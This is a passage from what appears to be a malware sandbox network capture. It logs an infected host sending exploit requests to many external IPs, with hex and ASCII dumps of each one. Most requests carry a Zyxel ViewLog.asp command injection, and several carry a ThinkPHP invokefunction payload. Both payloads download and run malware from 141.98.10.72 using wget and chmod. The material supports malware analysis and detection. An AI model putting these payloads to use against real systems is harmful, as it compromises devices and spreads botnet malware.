                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:28.858175039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.609872103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.393328905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399975061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      181192.168.2.153276831.136.195.2208080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.618483067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.290457010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.634442091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.482480049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:28.858278990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.609869003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.393345118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399952888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      182192.168.2.153300831.136.103.458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.618529081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.290441990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.634447098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.482331038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:28.858206987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.609863043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.393358946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399954081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      183192.168.2.153669895.244.243.1678080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.622298956 CET300OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.
                                                      Feb 14, 2024 09:29:18.856954098 CET498INHTTP/1.1 401 Unauthorized
                                                      WWW-Authenticate: Basic realm="Protected"
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      184192.168.2.155990495.85.162.558080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.626252890 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      185192.168.2.154984231.200.108.1878080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.646215916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      186192.168.2.156067694.122.15.1208080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.646423101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      187192.168.2.154415694.187.104.1288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.651468039 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      188192.168.2.153696295.216.204.25480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.025451899 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:19.245142937 CET48INHTTP/1.1 101 Switching Protocols


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      189192.168.2.153543895.163.141.10080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.037391901 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:19.271430016 CET323INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      190192.168.2.155183095.56.127.17980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.093570948 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:19.384411097 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:29:19.384948969 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      191192.168.2.154939495.58.75.22180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.100235939 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:19.398494005 CET29INHTTP/1.1 200 OK
